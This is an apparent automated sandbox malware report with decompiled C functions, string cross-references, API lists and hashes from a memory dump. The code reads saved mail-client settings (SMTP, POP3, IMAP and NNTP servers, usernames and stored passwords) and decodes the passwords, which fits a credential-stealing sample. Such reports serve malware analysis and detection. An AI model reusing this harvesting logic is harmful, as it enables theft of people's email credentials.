				E004021D8( &_v936);
				E004021D8( &_v1868);
				_t23 = 4;
				_v796 = _t23;
				_v1728 = _t23;
				_v408 = _t23;
				_v1340 = 1;
				E00403397(__edi, "SMTPServer",  &_v664);
				E00403397(__edi, "ESMTPUsername",  &_v404);
				E00403397(__edi, "ESMTPPassword",  &_v276);
				E00403397(__edi, "POP3Server",  &_v1596);
				E00403397(__edi, "POP3Username",  &_v1336);
				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
				if(_v276 != 0) {
					E004033B8( &_v276);
					_t35 = E00402407( &_v936, __fp0, _a4);
				}
				if(_v1208 != 0) {
					E004033B8( &_v1208);
					return E00402407( &_v1868, _t48, _a4);
				}
				return _t35;
			}

0x004033d7
0x004033e7
0x004033f2
0x004033f9
0x004033fa
0x00403400
0x00403406
0x00403419
0x00403423
0x00403435
0x00403447
0x00403459
0x0040346b
0x0040347d
0x00403489
0x00403491
0x0040349f
0x0040349f
0x004034ab
0x004034b3
0x00000000
0x004034c1
0x004034c8

Strings

ESMTPUsername, xrefs: 0040342F
POP3Password, xrefs: 00403477
SMTPServer, xrefs: 00403413
POP3Username, xrefs: 00403465
ESMTPPassword, xrefs: 00403441
POP3Server, xrefs: 00403453

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: PrivateProfileString_mbscmpstrlen
String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
API String ID: 3963849919-1658304561
Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59

Uniqueness

Uniqueness Score: -1.00%

Function 0040F808, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307
stringCOMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				void* _v11;
				char _v12;
				char _v13;
				char _v19;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				signed int _v28;
				short _v30;
				short _v32;
				char* _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char _v76;
				void _v88;
				intOrPtr _v92;
				char* _v96;
				char* _v100;
				intOrPtr _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				intOrPtr _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				intOrPtr _v156;
				char* _v160;
				char* _v164;
				char* _v168;
				intOrPtr _v172;
				char* _v176;
				char* _v180;
				char* _v184;
				char* _v188;
				char* _v192;
				char* _v196;
				intOrPtr _v200;
				char* _v204;
				char* _v208;
				char* _v212;
				char* _v216;
				char* _v220;
				char* _v224;
				char* _v228;
				intOrPtr _v232;
				char* _v236;
				char* _v240;
				char* _v244;
				char* _v248;
				char* _v252;
				intOrPtr _v256;
				char* _v260;
				char* _v264;
				char* _v268;
				char* _v272;
				char* _v276;
				char* _v280;
				intOrPtr _v284;
				char* _v288;
				char* _v292;
				char* _v296;
				intOrPtr _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				intOrPtr _v328;
				char* _v332;
				char* _v336;
				char* _v340;
				char* _v344;
				char* _v348;
				char* _v352;
				char* _v356;
				char* _v360;
				char* _v364;
				intOrPtr _v368;
				intOrPtr _v372;
				char* _v376;
				char* _v380;
				intOrPtr _v384;
				char* _v388;
				char* _v392;
				intOrPtr _v396;
				intOrPtr _v400;
				char* _v404;
				char* _v408;
				intOrPtr _v412;
				char* _v416;
				char* _v420;
				char* _v424;
				char* _v428;
				intOrPtr _v432;
				intOrPtr _v436;
				char* _v440;
				intOrPtr _v444;
				char* _v448;
				char* _v452;
				char* _v456;
				char* _v460;
				intOrPtr _v464;
				char* _v468;
				intOrPtr* _t200;
				char* _t202;
				char _t203;
				int _t205;
				int _t206;
				intOrPtr _t209;
				char* _t211;
				int _t213;
				void _t216;
				char _t220;
				void _t221;
				int _t226;
				signed int _t231;
				intOrPtr* _t232;
				void _t237;
				void* _t238;
				void* _t240;
				void* _t245;
				signed int _t246;
				signed int _t249;
				int _t250;
				void* _t251;
				int _t252;
				void* _t254;
				void* _t255;
				void* _t256;

				_v64 = "amp;";
				_v60 = "lt;";
				_v56 = "gt;";
				_v52 = "quot;";
				_v48 = "nbsp;";
				_v44 = "apos;";
				_v24 = 0x26;
				_v23 = 0x3c;
				_v22 = 0x3e;
				_v21 = 0x22;
				_v20 = 0x20;
				_v19 = 0x27;
				_v468 = "iexcl;";
				_v464 = "cent;";
				_v460 = "pound;";
				_v456 = "curren;";
				_v452 = "yen;";
				_v448 = "brvbar;";
				_v444 = "sect;";
				_v440 = "uml;";
				_v436 = "copy;";
				_v432 = "ordf;";
				_v428 = "laquo;";
				_v424 = "not;";
				_v420 = "shy;";
				_v416 = "reg;";
				_v412 = "macr;";
				_v408 = "deg;";
				_v404 = "plusmn;";
				_v400 = "sup2;";
				_v396 = "sup3;";
				_v392 = "acute;";
				_v388 = "micro;";
				_v384 = "para;";
				_v380 = "middot;";
				_v376 = "cedil;";
				_v372 = "sup1;";
				_v368 = "ordm;";
				_v364 = "raquo;";
				_v360 = "frac14;";
				_v356 = "frac12;";
				_v352 = "frac34;";
				_v348 = "iquest;";
				_v344 = "Agrave;";
				_v340 = "Aacute;";
				_v336 = "Acirc;";
				_v332 = "Atilde;";
				_v328 = "Auml;";
				_v324 = "Aring;";
				_v320 = "AElig;";
				_v316 = "Ccedil;";
				_v312 = "Egrave;";
				_v308 = "Eacute;";
				_v304 = "Ecirc;";
				_v300 = "Euml;";
				_v296 = "Igrave;";
				_v292 = "Iacute;";
				_v288 = "Icirc;";
				_v284 = "Iuml;";
				_v280 = "ETH;";
				_v276 = "Ntilde;";
				_v272 = "Ograve;";
				_v268 = "Oacute;";
				_v264 = "Ocirc;";
				_v260 = "Otilde;";
				_v256 = "Ouml;";
				_v252 = "times;";
				_v248 = "Oslash;";
				_v244 = "Ugrave;";
				_v240 = "Uacute;";
				_v236 = "Ucirc;";
				_v232 = "Uuml;";
				_v228 = "Yacute;";
				_v224 = "THORN;";
				_v220 = "szlig;";
				_v216 = "agrave;";
				_v212 = "aacute;";
				_v208 = "acirc;";
				_v204 = "atilde;";
				_t200 = _a8;
				_v28 = _v28 | 0xffffffff;
				_t231 = 0;
				_t254 = 0;
				_v200 = "auml;";
				_v196 = "aring;";
				_v192 = "aelig;";
				_v188 = "ccedil;";
				_v184 = "egrave;";
				_v180 = "eacute;";
				_v176 = "ecirc;";
				_v172 = "euml;";
				_v168 = "igrave;";
				_v164 = "iacute;";
				_v160 = "icirc;";
				_v156 = "iuml;";
				_v152 = "eth;";
				_v148 = "ntilde;";
				_v144 = "ograve;";
				_v140 = "oacute;";
				_v136 = "ocirc;";
				_v132 = "otilde;";
				_v128 = "ouml;";
				_v124 = "divide;";
				_v120 = "oslash;";
				_v116 = "ugrave;";
				_v112 = "uacute;";
				_v108 = "ucirc;";
				_v104 = "uuml;";
				_v100 = "yacute;";
				_v96 = "thorn;";
				_v92 = "yuml;";
				if( *_t200 == 0) {
					L45:
					_t202 = _a4 + _t231;
					 *_t202 = 0;
					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
						return _t202;
					} else {
						 *((char*)(_t202 - 1)) = 0;
						return _t202;
					}
				}
				while(_a12 == 0xffffffff || _a12 > _t254) {
					_t232 = _t254 + _t200;
					_t203 =  *_t232;
					_v13 = _t203;
					if(_t203 != 0x26) {
						L33:
						if(_a16 == 0 || _t203 > 0x20) {
							 *((char*)(_t231 + _a4)) = _t203;
							_t231 = _t231 + 1;
						} else {
							if(_t231 != _v28) {
								 *((char*)(_t231 + _a4)) = 0x20;
								_t231 = _t231 + 1;
								if(_a20 != 0 && _t231 == 1) {
									_t231 = 0;
								}
							}
							_v28 = _t231;
						}
						_t254 = _t254 + 1;
						L43:
						_t200 = _a8;
						if( *((char*)(_t254 + _t200)) != 0) {
							continue;
						}
						break;
					}
					_t249 = 0;
					_v36 = _t232 + 1;
					while(1) {
						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
						_v8 = _t205;
						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
						_t256 = _t256 + 0x10;
						if(_t206 == 0) {
							break;
						}
						_t249 = _t249 + 1;
						if(_t249 < 6) {
							continue;
						}
						_t209 = _a8;
						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
							L29:
							_v8 = _v8 & 0x00000000;
							while(1) {
								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
								_v40 = _t211;
								_t250 = strlen(_t211);
								_t213 = strncmp(_v36, _v40, _t250);
								_t256 = _t256 + 0x10;
								if(_t213 == 0) {
									break;
								}
								_v8 = _v8 + 1;
								if(_v8 < 0x5f) {
									continue;
								}
								_t203 = _v13;
								goto L33;
							}
							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
							_t231 = _t231 + 1;
							_t254 = _t254 + _t250 + 1;
							goto L43;
						}
						_t128 = _t209 + 2; // 0x2
						_t251 = _t254 + _t128;
						_t237 =  *_t251;
						if(_t237 == 0x78 || _t237 == 0x58) {
							_t159 = _t209 + 3; // 0x3
							_t245 = _t254 + _t159;
							_t238 = _t245;
							_t252 = 0;
							while(1) {
								_t216 =  *_t238;
								if(_t216 == 0) {
									break;
								}
								if(_t216 == 0x3b) {
									L27:
									if(_t252 <= 0) {
										goto L29;
									}
									memcpy( &_v88, _t245, _t252);
									 *((char*)(_t255 + _t252 - 0x54)) = 0;
									_t220 = E00406512( &_v88);
									_t256 = _t256 + 0x10;
									 *((char*)(_t231 + _a4)) = _t220;
									_t231 = _t231 + 1;
									_t254 = _t254 + _t252 + 4;
									goto L43;
								}
								_t252 = _t252 + 1;
								if(_t252 >= 4) {
									break;
								}
								_t238 = _t238 + 1;
							}
							_t252 = _t252 | 0xffffffff;
							goto L27;
						} else {
							_t240 = _t251;
							_t246 = 0;
							while(1) {
								_t221 =  *_t240;
								if(_t221 == 0) {
									break;
								}
								if(_t221 == 0x3b) {
									_v8 = _t246;
									L18:
									if(_v8 <= 0) {
										goto L29;
									}
									memcpy( &_v76, _t251, _v8);
									 *((char*)(_t255 + _v8 - 0x48)) = 0;
									_t226 = atoi( &_v76);
									_t256 = _t256 + 0x10;
									_v32 = _t226;
									_v12 = 0;
									asm("stosb");
									_v30 = 0;
									WideCharToMultiByte(0, 0,  &_v32, 0xffffffff,  &_v12, 2, 0, 0);
									 *((char*)(_t231 + _a4)) = _v12;
									_t231 = _t231 + 1;
									_t254 = _t254 + _v8 + 3;
									goto L43;
								}
								_t246 = _t246 + 1;
								if(_t246 >= 6) {
									break;
								}
								_t240 = _t240 + 1;
							}
							_v8 = _v8 | 0xffffffff;
							goto L18;
						}
					}
					 *((char*)(_t231 + _a4)) =  *((intOrPtr*)(_t255 + _t249 - 0x14));
					_t231 = _t231 + 1;
					_t254 = _t254 + _v8 + 1;
					goto L43;
				}
				goto L45;
			}

0x0040f813
0x0040f81a
0x0040f821
0x0040f828
0x0040f82f
0x0040f836
0x0040f83d
0x0040f841
0x0040f845
0x0040f849
0x0040f84d
0x0040f851
0x0040f855
0x0040f85f
0x0040f869
0x0040f873
0x0040f87d
0x0040f887
0x0040f891
0x0040f89b
0x0040f8a5
0x0040f8af
0x0040f8b9
0x0040f8c3
0x0040f8cd
0x0040f8d7
0x0040f8e1
0x0040f8eb
0x0040f8f5
0x0040f8ff
0x0040f909
0x0040f913
0x0040f91d
0x0040f927
0x0040f931
0x0040f93b
0x0040f945
0x0040f94f
0x0040f959
0x0040f963
0x0040f96d
0x0040f977
0x0040f981
0x0040f98b
0x0040f995
0x0040f99f
0x0040f9a9
0x0040f9b3
0x0040f9bd
0x0040f9c7
0x0040f9d1
0x0040f9db
0x0040f9e5
0x0040f9ef
0x0040f9f9
0x0040fa03
0x0040fa0d
0x0040fa17
0x0040fa21
0x0040fa2b
0x0040fa35
0x0040fa3f
0x0040fa49
0x0040fa53
0x0040fa5d
0x0040fa67
0x0040fa71
0x0040fa7b
0x0040fa85
0x0040fa8f
0x0040fa99
0x0040faa3
0x0040faad
0x0040fab7
0x0040fac1
0x0040facb
0x0040fad5
0x0040fadf
0x0040fae9
0x0040faf3
0x0040faf6
0x0040fafa
0x0040fafc
0x0040fb00
0x0040fb0a
0x0040fb14
0x0040fb1e
0x0040fb28
0x0040fb32
0x0040fb3c
0x0040fb46
0x0040fb50
0x0040fb5a
0x0040fb64
0x0040fb6e
0x0040fb78
0x0040fb82
0x0040fb8c
0x0040fb96
0x0040fba0
0x0040fbaa
0x0040fbb1
0x0040fbb8
0x0040fbbf
0x0040fbc6
0x0040fbcd
0x0040fbd4
0x0040fbdb
0x0040fbe2
0x0040fbe9
0x0040fbf0
0x0040fbf7
0x0040fde5
0x0040fde8
0x0040fdee
0x0040fdf1
0x0040fe04
0x0040fdfd
0x0040fdfd
0x00000000
0x0040fdfd
0x0040fdf1
0x0040fbfe
0x0040fc0d
0x0040fc10
0x0040fc14
0x0040fc17
0x0040fd94
0x0040fd98
0x0040fdd2
0x0040fdd5
0x0040fd9e
0x0040fda1
0x0040fda6
0x0040fdaa
0x0040fdaf
0x0040fdb6
0x0040fdb6
0x0040fdaf
0x0040fdb8
0x0040fdb8
0x0040fdd6
0x0040fdd7
0x0040fdd7
0x0040fdde
0x00000000
0x00000000
0x00000000
0x0040fdde
0x0040fc1d
0x0040fc20
0x0040fc23
0x0040fc27
0x0040fc31
0x0040fc37
0x0040fc3c
0x0040fc41
0x00000000
0x00000000
0x0040fc43
0x0040fc47
0x00000000
0x00000000
0x0040fc49
0x0040fc51
0x0040fd5c
0x0040fd5c
0x0040fd60
0x0040fd63
0x0040fd6b
0x0040fd73
0x0040fd7c
0x0040fd81
0x0040fd86
0x00000000
0x00000000
0x0040fd88
0x0040fd8f
0x00000000
0x00000000
0x0040fd91
0x00000000
0x0040fd91
0x0040fdc5
0x0040fdc8
0x0040fdc9
0x00000000
0x0040fdc9
0x0040fc57
0x0040fc57
0x0040fc5b
0x0040fc60
0x0040fd11
0x0040fd11
0x0040fd15
0x0040fd17
0x0040fd26
0x0040fd26
0x0040fd2a
0x00000000
0x00000000
0x0040fd1d
0x0040fd2f
0x0040fd31
0x00000000
0x00000000
0x0040fd39
0x0040fd42
0x0040fd47
0x0040fd4f
0x0040fd52
0x0040fd55
0x0040fd56
0x00000000
0x0040fd56
0x0040fd1f
0x0040fd23
0x00000000
0x00000000
0x0040fd25
0x0040fd25
0x0040fd2c
0x00000000
0x0040fc6f
0x0040fc6f
0x0040fc71
0x0040fc97
0x0040fc97
0x0040fc9b
0x00000000
0x00000000
0x0040fc8e
0x0040fd0c
0x0040fca1
0x0040fca5
0x00000000
0x00000000
0x0040fcb3
0x0040fcbb
0x0040fcc4
0x0040fcc9
0x0040fcd4
0x0040fce3
0x0040fceb
0x0040fcec
0x0040fcf0
0x0040fcfc
0x0040fd02
0x0040fd03
0x00000000
0x0040fd03
0x0040fc90
0x0040fc94
0x00000000
0x00000000
0x0040fc96
0x0040fc96
0x0040fc9d
0x00000000
0x0040fc9d
0x0040fc60
0x0040fc7c
0x0040fc82
0x0040fc83
0x00000000
0x0040fc83
0x00000000

APIs

strlen.MSVCRT ref: 0040FC27
strncmp.MSVCRT(?,00413F68,00000000,00413F68,?,?,?), ref: 0040FC37
memcpy.MSVCRT ref: 0040FCB3
atoi.MSVCRT ref: 0040FCC4
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 0040FCF0

Strings

Iacute;, xrefs: 0040FA0D
Uacute;, xrefs: 0040FA8F
ordm;, xrefs: 0040F94F
Ucirc;, xrefs: 0040FA99
Auml;, xrefs: 0040F9B3
sect;, xrefs: 0040F891
copy;, xrefs: 0040F8A5
cedil;, xrefs: 0040F93B
Acirc;, xrefs: 0040F99F
oacute;, xrefs: 0040FB96
gt;, xrefs: 0040F821
auml;, xrefs: 0040FB00
ecirc;, xrefs: 0040FB3C
frac34;, xrefs: 0040F977
iacute;, xrefs: 0040FB5A
oslash;, xrefs: 0040FBBF
euml;, xrefs: 0040FB46
otilde;, xrefs: 0040FBAA
brvbar;, xrefs: 0040F887
egrave;, xrefs: 0040FB28
ETH;, xrefs: 0040FA2B
yacute;, xrefs: 0040FBE2
plusmn;, xrefs: 0040F8F5
aelig;, xrefs: 0040FB14
agrave;, xrefs: 0040FACB
Aring;, xrefs: 0040F9BD
yen;, xrefs: 0040F87D
Iuml;, xrefs: 0040FA21
Ocirc;, xrefs: 0040FA53
ordf;, xrefs: 0040F8AF
icirc;, xrefs: 0040FB64
curren;, xrefs: 0040F873
eacute;, xrefs: 0040FB32
macr;, xrefs: 0040F8E1
ccedil;, xrefs: 0040FB1E
apos;, xrefs: 0040F836
reg;, xrefs: 0040F8D7
AElig;, xrefs: 0040F9C7
uacute;, xrefs: 0040FBCD
Ecirc;, xrefs: 0040F9EF
micro;, xrefs: 0040F91D
middot;, xrefs: 0040F931
Igrave;, xrefs: 0040FA03
lt;, xrefs: 0040F81A
aacute;, xrefs: 0040FAD5
laquo;, xrefs: 0040F8B9
Eacute;, xrefs: 0040F9E5
yuml;, xrefs: 0040FBF0
Egrave;, xrefs: 0040F9DB
Ntilde;, xrefs: 0040FA35
sup3;, xrefs: 0040F909
frac12;, xrefs: 0040F96D
Ccedil;, xrefs: 0040F9D1
cent;, xrefs: 0040F85F
iuml;, xrefs: 0040FB6E
acirc;, xrefs: 0040FADF
Atilde;, xrefs: 0040F9A9
atilde;, xrefs: 0040FAE9
not;, xrefs: 0040F8C3
uuml;, xrefs: 0040FBDB
nbsp;, xrefs: 0040F82F
amp;, xrefs: 0040F813
ocirc;, xrefs: 0040FBA0
shy;, xrefs: 0040F8CD
deg;, xrefs: 0040F8EB
Oacute;, xrefs: 0040FA49
ouml;, xrefs: 0040FBB1
thorn;, xrefs: 0040FBE9
divide;, xrefs: 0040FBB8
frac14;, xrefs: 0040F963
sup1;, xrefs: 0040F945
Agrave;, xrefs: 0040F98B
Ouml;, xrefs: 0040FA67
Oslash;, xrefs: 0040FA7B
igrave;, xrefs: 0040FB50
iexcl;, xrefs: 0040F855
Otilde;, xrefs: 0040FA5D
times;, xrefs: 0040FA71
THORN;, xrefs: 0040FAB7
aring;, xrefs: 0040FB0A
quot;, xrefs: 0040F828
ntilde;, xrefs: 0040FB82
ograve;, xrefs: 0040FB8C
Aacute;, xrefs: 0040F995
Euml;, xrefs: 0040F9F9
Yacute;, xrefs: 0040FAAD
sup2;, xrefs: 0040F8FF
Ugrave;, xrefs: 0040FA85
eth;, xrefs: 0040FB78
Uuml;, xrefs: 0040FAA3
Ograve;, xrefs: 0040FA3F
szlig;, xrefs: 0040FAC1
iquest;, xrefs: 0040F981
pound;, xrefs: 0040F869
uml;, xrefs: 0040F89B
ugrave;, xrefs: 0040FBC6
Icirc;, xrefs: 0040FA17
acute;, xrefs: 0040F913
para;, xrefs: 0040F927
raquo;, xrefs: 0040F959
ucirc;, xrefs: 0040FBD4

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWideatoimemcpystrlenstrncmp
String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
API String ID: 1895597112-3210201812
Opcode ID: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
Instruction ID: 7b61ab7fda62f62168f3ac6a9ee0746413b6f8a7e258cbbb94e4f4552fbd63bc
Opcode Fuzzy Hash: e32dadd6ea65d4380dfb3bd6d4dee2632db13c381429c7de7dc985ffcf152ca1
Instruction Fuzzy Hash: 49F139B08012589EDB21CF95D8487DEBFB0AF96308F5481EAD5593B241C7B94BC9CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004106BE, Relevance: 80.8, APIs: 23, Strings: 23, Instructions: 309
stringCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004106BE(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				int _t58;
				int _t59;
				int _t60;
				int _t61;
				int _t63;
				void* _t96;
				void* _t99;
				void* _t102;
				void* _t105;
				void* _t108;
				void* _t111;
				void* _t114;
				void* _t117;
				void* _t123;
				void* _t194;
				void* _t196;
				void* _t201;
				char* _t202;

				_t194 = __edx;
				_t201 = __ecx;
				if(strcmp(__ecx + 0x46c, "Account_Name") == 0) {
					_t204 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0x870, E00406B74( *(_t201 + 0x460)));
					_t123 = E00406B74( *_t204);
					_t195 = _t201 + 0xf84;
					E004060D0(0xff, _t201 + 0xf84, _t123);
				}
				_t202 = _t201 + 0x46c;
				if(strcmp(_t202, "POP3_Server") == 0) {
					_t117 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t117);
				}
				if(strcmp(_t202, "IMAP_Server") == 0) {
					_t114 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t114);
				}
				if(strcmp(_t202, "NNTP_Server") == 0) {
					_t111 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x970;
					E004060D0(0xff, _t201 + 0x970, _t111);
				}
				if(strcmp(_t202, "SMTP_Server") == 0) {
					_t108 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1084;
					E004060D0(0xff, _t201 + 0x1084, _t108);
				}
				if(strcmp(_t202, "POP3_User_Name") == 0) {
					_t105 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t105);
					 *((intOrPtr*)(_t201 + 0xf70)) = 1;
				}
				if(strcmp(_t202, "IMAP_User_Name") == 0) {
					_t102 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t102);
					 *((intOrPtr*)(_t201 + 0xf70)) = 2;
				}
				if(strcmp(_t202, "NNTP_User_Name") == 0) {
					_t99 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0xb70;
					E004060D0(0xff, _t201 + 0xb70, _t99);
					 *((intOrPtr*)(_t201 + 0xf70)) = 4;
				}
				if(strcmp(_t202, "SMTP_User_Name") == 0) {
					_t96 = E00406B74( *((intOrPtr*)(_t201 + 0x460)));
					_t195 = _t201 + 0x1284;
					E004060D0(0xff, _t201 + 0x1284, _t96);
					 *((intOrPtr*)(_t201 + 0x1684)) = 3;
				}
				_t58 = strcmp(_t202, "POP3_Password2");
				_t214 = _t58;
				if(_t58 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t214, _t201, _t201 + 0x870);
				}
				_t59 = strcmp(_t202, "IMAP_Password2");
				_t215 = _t59;
				if(_t59 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t215, _t201, _t201 + 0x870);
				}
				_t60 = strcmp(_t202, "NNTP_Password2");
				_t216 = _t60;
				if(_t60 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t216, _t201, _t201 + 0x870);
				}
				_t61 = strcmp(_t202, "SMTP_Password2");
				_t217 = _t61;
				if(_t61 == 0) {
					E00410525(E00406B74( *((intOrPtr*)(_t201 + 0x460))), _t194, _t195, _t217, _t201, _t201 + 0xf84);
				}
				if(strcmp(_t202, "NNTP_Email_Address") == 0) {
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				}
				_t63 = strcmp(_t202, "SMTP_Email_Address");
				if(_t63 == 0) {
					_t203 = _t201 + 0x460;
					E004060D0(0xff, _t201 + 0xe70, E00406B74( *(_t201 + 0x460)));
					_t63 = E004060D0(0xff, _t201 + 0x1584, E00406B74( *_t203));
				}
				_push("SMTP_Port");
				_t196 = _t201 + 0x46c;
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x168c) = _t63;
				}
				_push("NNTP_Port");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L35:
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0xf78) = _t63;
				} else {
					_push("IMAP_Port");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L35;
					} else {
						_push("POP3_Port");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L35;
						}
					}
				}
				_push("SMTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					_t63 = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
					 *(_t201 + 0x1690) = _t63;
				}
				_push("NNTP_Secure_Connection");
				_push(_t196);
				L004115DC();
				if(_t63 == 0) {
					L41:
					 *((intOrPtr*)(_t201 + 0xf7c)) = E00406512(E00406B74( *((intOrPtr*)(_t201 + 0x460))));
				} else {
					_push("IMAP_Secure_Connection");
					_push(_t196);
					L004115DC();
					if(_t63 == 0) {
						goto L41;
					} else {
						_push("POP3_Secure_Connection");
						_push(_t196);
						L004115DC();
						if(_t63 == 0) {
							goto L41;
						}
					}
				}
				return 1;
			}

0x004106be
0x004106c2
0x004106de
0x004106e0
0x004106f5
0x004106fe
0x00410704
0x0041070a
0x0041070f
0x00410715
0x00410725
0x0041072d
0x00410733
0x00410739
0x0041073e
0x0041074e
0x00410756
0x0041075c
0x00410762
0x00410767
0x00410777
0x0041077f
0x00410785
0x0041078b
0x00410790
0x004107a0
0x004107a8
0x004107ae
0x004107b4
0x004107b9
0x004107c9
0x004107d1
0x004107d7
0x004107dd
0x004107e3
0x004107e3
0x004107fc
0x00410804
0x0041080a
0x00410810
0x00410816
0x00410816
0x0041082f
0x00410837
0x0041083d
0x00410843
0x00410849
0x00410849
0x00410862
0x0041086a
0x00410870
0x00410876
0x0041087c
0x0041087c
0x0041088c
0x00410891
0x00410895
0x004108aa
0x004108aa
0x004108b5
0x004108ba
0x004108be
0x004108d3
0x004108d3
0x004108de
0x004108e3
0x004108e7
0x004108fc
0x004108fc
0x00410907
0x0041090c
0x00410910
0x00410925
0x00410925
0x00410939
0x0041094d
0x00410952
0x00410959
0x00410962
0x00410964
0x00410979
0x0041098e
0x00410993
0x00410994
0x00410999
0x0041099f
0x004109a0
0x004109a9
0x004109b7
0x004109bd
0x004109bd
0x004109c3
0x004109c8
0x004109c9
0x004109d2
0x004109f6
0x00410a02
0x00410a08
0x004109d4
0x004109d4
0x004109d9
0x004109da
0x004109e3
0x00000000
0x004109e5
0x004109e5
0x004109ea
0x004109eb
0x004109f4
0x00000000
0x00000000
0x004109f4
0x004109e3
0x00410a0e
0x00410a13
0x00410a14
0x00410a1d
0x00410a2b
0x00410a31
0x00410a31
0x00410a37
0x00410a3c
0x00410a3d
0x00410a46
0x00410a6a
0x00410a7c
0x00410a48
0x00410a48
0x00410a4d
0x00410a4e
0x00410a57
0x00000000
0x00410a59
0x00410a59
0x00410a5e
0x00410a5f
0x00410a68
0x00000000
0x00000000
0x00410a68
0x00410a57
0x00410a89

APIs

strcmp.MSVCRT ref: 004106D0
strcmp.MSVCRT ref: 0041071C
strcmp.MSVCRT ref: 00410745
strcmp.MSVCRT ref: 0041076E
strcmp.MSVCRT ref: 00410797
strcmp.MSVCRT ref: 004107C0
strcmp.MSVCRT ref: 004107F3
strcmp.MSVCRT ref: 00410826
strcmp.MSVCRT ref: 0041088C
strcmp.MSVCRT ref: 004108B5
strcmp.MSVCRT ref: 004108DE
strcmp.MSVCRT ref: 00410907
strcmp.MSVCRT ref: 00410930
strcmp.MSVCRT ref: 00410959
strcmp.MSVCRT ref: 00410859

